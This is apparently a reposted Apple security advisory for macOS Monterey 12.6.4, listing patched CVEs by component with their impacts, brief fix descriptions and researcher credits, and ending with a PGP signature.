03qFLcjb1GxM/U+lKN5Xx4rH+BR0yrEx20oZGX9Vymn7UJVYlDI=  
=xOHM  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-5

Apple Security Advisory 2023-03-27-4 - macOS Monterey 12.6.4 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-4 macOS Monterey 12.6.4

macOS Monterey 12.6.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213677.

Apple Neural Engine  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Monterey  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Monterey  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

ColorSync  
Available for: macOS Monterey  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Monterey  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Foundation  
Available for: macOS Monterey  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Monterey  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27933: sqrtpwn

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

Model I/O  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-27949: Mickey Jin (@patch1t)

NetworkExtension  
Available for: macOS Monterey  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-23538: Mickey Jin (@patch1t)  
CVE-2023-27962: Mickey Jin (@patch1t)

Podcasts  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-27942: Mickey Jin (@patch1t)

Sandbox  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-23533: Mickey Jin (@patch1t), Koh M. Nakagawa of FFRI  
Security, Inc., and Csaba Fitzl (@theevilbit) of Offensive Security

Sandbox  
Available for: macOS Monterey  
Impact: An app may be able to bypass Privacy preferences  
Description: A logic issue was addressed with improved validation.  
CVE-2023-28178: Yiğit Can YILMAZ (@yilmazcanyigit)

Shortcuts  
Available for: macOS Monterey  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2023-27963: Jubaer Alnazi Jabin of TRS Group Of Companies and  
Wenchao Li and Xiaolong Bai of Alibaba Group

System Settings  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Monterey  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Monterey  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Monterey 12.6.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxn7kg/9FdItHdT/4pNdkvgRRdAppZbLHwvTICqQL5NW9r2at6bsEVI4euNmz6Nc  
tZev1qAgiHKohwtblwLmt5x7T6j4GJ/JlR/6owBhu2K3Zd+dMfFyz3Azgb9o/3JM  
SDLhOGilCQxrg/MBMvT1GVOhDbGZpj8CdVj5zux0cEOW070fsVAeU8U8eUsa9Oer  
Ihoys5FSfQ9Wvl8jtTuAQE2kuoh/vwnThpT1XEp95fW4u98GkTyoZDk01/aVuNDN  
nuqnJVAi12V3pWeT19wWk2osILE7cdLFWi3d5qK7YHUhy/YsVRMwwPUVPPSYq3bF  
RIZmBCHNO1TJniM/0Ji6FyPwQpt0v0kabxZnYLy/0pilRsMlJNPhcTm6CTCCKp/M  
YBhiJMIZcxr6qjzb4yq+VO1bSS0bjFZYJBM71fb0MBdnl2ogLYRh8c+WvDA/Avmq  
fjXxpAH/wXkO1J+ccJl+5ESIP6eEc+jm8ra5oiZETDRO3UhPtcHWPSJcKKzIyv9U  
ZP+4jYDmDeNAzpS6b/sI+1DD86ozxv2WdFGo1k7P0o8AFb4XnY4GoZYy7cOAm5EA  
FUyJokGkgByuvu9XhbEzSM/K24dQziWTj2eNMXXl/FV5/1A629ZcCAXKwzO+0dYF  
tthhKi6q7oFAIBB5FiapaJNQsazipx+XGFKQUNDZAmuG4GsIiFg=  
=GR5+  
-----END PGP SIGNATURE-----

Tag

#cisco